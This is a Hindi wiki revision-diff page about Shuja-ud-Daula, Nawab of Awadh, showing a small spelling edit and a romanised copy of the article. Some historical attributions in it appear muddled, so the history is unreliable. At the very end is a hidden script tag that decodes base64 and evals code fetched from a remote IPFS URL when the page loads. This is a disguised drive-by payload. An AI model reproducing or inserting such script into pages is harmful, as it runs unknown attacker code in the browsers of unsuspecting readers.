Difference between revisions of "शुजाउद्दौला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 7: Line 7:
 
*1772 ई. में उसने रुहेलों से इस आशय की सन्धि की कि यदि मराठों ने उन पर आक्रमण किया तो वह मराठों को इधर न बढ़ने देगा और इसके बदले में रुहेल उसे 40 लाख रुपये की धनराशि देंगे।
 
*1772 ई. में उसने रुहेलों से इस आशय की सन्धि की कि यदि मराठों ने उन पर आक्रमण किया तो वह मराठों को इधर न बढ़ने देगा और इसके बदले में रुहेल उसे 40 लाख रुपये की धनराशि देंगे।
 
*1773 में मराठों ने रुहेलखण्ड पर आक्रमण किया, किन्तु वे बिना किसी युद्ध के ही वापस लौट गये। अब शुजाउद्दौला ने रुहेलों से 40 लाख रुपयों की निर्धारित धनराशि की माँग की और रुहेल उसे देने में आनाकानी करने लगे। अतएव शुजाउद्दौला ने कम्पनी के साथ बनारस की प्रसिद्ध सन्धि कर ली, जिसकी शर्तों के अनुसार 50 लाख रुपये के बदले उन्हें कड़ा और इलाहाबाद ज़िले को पुनः प्राप्त हो गये तथा [[लखनऊ]] में कम्पनी की एक पलटन रखने के बदले उन्हें निश्चित धनराशि भी प्राप्त हुई। [[बनारस]] में ही उसे बंगाल के गवर्नर [[वारेन हेस्टिंग्स]] द्वारा यह आश्वासन मिला कि कम्पनी रुहेलों से 40 लाख रुपये प्राप्त करने में शुजउद्दौला की सहायता अंग्रेज़ पलटन के द्वारा करेगी, क्योंकि शुजाउद्दौला की दृष्टि में रुहेलों से वह धनराशि उसको मिलनी थी।  
 
*1773 में मराठों ने रुहेलखण्ड पर आक्रमण किया, किन्तु वे बिना किसी युद्ध के ही वापस लौट गये। अब शुजाउद्दौला ने रुहेलों से 40 लाख रुपयों की निर्धारित धनराशि की माँग की और रुहेल उसे देने में आनाकानी करने लगे। अतएव शुजाउद्दौला ने कम्पनी के साथ बनारस की प्रसिद्ध सन्धि कर ली, जिसकी शर्तों के अनुसार 50 लाख रुपये के बदले उन्हें कड़ा और इलाहाबाद ज़िले को पुनः प्राप्त हो गये तथा [[लखनऊ]] में कम्पनी की एक पलटन रखने के बदले उन्हें निश्चित धनराशि भी प्राप्त हुई। [[बनारस]] में ही उसे बंगाल के गवर्नर [[वारेन हेस्टिंग्स]] द्वारा यह आश्वासन मिला कि कम्पनी रुहेलों से 40 लाख रुपये प्राप्त करने में शुजउद्दौला की सहायता अंग्रेज़ पलटन के द्वारा करेगी, क्योंकि शुजाउद्दौला की दृष्टि में रुहेलों से वह धनराशि उसको मिलनी थी।  
*1774 ई. में नवाब ने अंग्रेज़ पलटन की सहायता से [[रुहेलखण्ड]] पर आक्रमण किया, वहाँ के शासक हाफ़िज अहमद ख़ाँ को मीरनपुर कटरा के युद्ध में पराजित किया और रुहेलखण्ड को अपने राज्य में सम्मिलित कर लिया। दूसरे ही वर्ष शुजाउद्दौला की मृत्यु हो गयी।
+
*1774 ई. में नवाब ने अंग्रेज़ पलटन की सहायता से [[रूहेलखण्ड]] पर आक्रमण किया, वहाँ के शासक हाफ़िज अहमद ख़ाँ को मीरनपुर कटरा के युद्ध में पराजित किया और रुहेलखण्ड को अपने राज्य में सम्मिलित कर लिया। दूसरे ही वर्ष शुजाउद्दौला की मृत्यु हो गयी।
 
*शुजाउद्दौला की मृत्यु के बाद उसका बेटा [[आसफ़उद्दौला]] उत्तराधिकारी और नवाब था।
 
*शुजाउद्दौला की मृत्यु के बाद उसका बेटा [[आसफ़उद्दौला]] उत्तराधिकारी और नवाब था।
  

Revision as of 06:44, 21 July 2011

thumb|chitrakar dvara chitrit shujauddaula ka chitr

  • avadh ka tritiy svatantr navab aur vahaan ke dvitiy navab saphadarajang ka putr tatha uttaradhikari tha. shujauddaula ko alamagir dvitiy (1754-59) tatha shahalam dvitiy (1759-1806) namak mugal samrat se vazir ka ohada mila. kintu usane ahamadashah abdali ke akraman ke samay samrat ki koee sahayata nahian ki, jab abdali ne 1756 ee. mean dilli ko loota.
  • 1759 ee. mean panjab par poorn adhikar kar liya.
  • mugal samrat tatha usake sahayak marathoan ko 1761 ee. mean panipat ke tritiy yuddh mean parast kiya. shujauddaula ne sadaiv keval apane vansh ke hi hitoan par dhyan diya.
  • 1764 ee. mean usane bangal se bhagakar sahayatarth ane vale vahaan ke navab mir qasim tatha shahalam dvitiy se kampani ke viruddh ek sandhi ki, par baksar ke yuddh mean vah parajit hua.
  • 1765 ee. mean usane k da aur ilahabad ke ziloan sahit 50 lakh rupaye ki dhanarashi harazane ke roop mean dekar aangrezoan se sandhi kar li. sath hi usane aangrezoan se ek surakshatmak sandhi bhi ki, jisake anusar usake rajy ki simaoan ke raksharth kampani ne use is qarar ke anusar sahayata dena svikar kiya ki sena ka sampoorn vyay bhar use vahan karana hoga.
  • 1772 ee. mean usane ruheloan se is ashay ki sandhi ki ki yadi marathoan ne un par akraman kiya to vah marathoan ko idhar n badhane dega aur isake badale mean ruhel use 40 lakh rupaye ki dhanarashi deange.
  • 1773 mean marathoan ne ruhelakhand par akraman kiya, kintu ve bina kisi yuddh ke hi vapas laut gaye. ab shujauddaula ne ruheloan se 40 lakh rupayoan ki nirdharit dhanarashi ki maang ki aur ruhel use dene mean anakani karane lage. atev shujauddaula ne kampani ke sath banaras ki prasiddh sandhi kar li, jisaki shartoan ke anusar 50 lakh rupaye ke badale unhean k da aur ilahabad zile ko punah prapt ho gaye tatha lakhanoo mean kampani ki ek palatan rakhane ke badale unhean nishchit dhanarashi bhi prapt huee. banaras mean hi use bangal ke gavarnar varen hestiangs dvara yah ashvasan mila ki kampani ruheloan se 40 lakh rupaye prapt karane mean shujuddaula ki sahayata aangrez palatan ke dvara karegi, kyoanki shujauddaula ki drishti mean ruheloan se vah dhanarashi usako milani thi.
  • 1774 ee. mean navab ne aangrez palatan ki sahayata se roohelakhand par akraman kiya, vahaan ke shasak hafij ahamad khaan ko miranapur katara ke yuddh mean parajit kiya aur ruhelakhand ko apane rajy mean sammilit kar liya. doosare hi varsh shujauddaula ki mrityu ho gayi.
  • shujauddaula ki mrityu ke bad usaka beta asafuddaula uttaradhikari aur navab tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>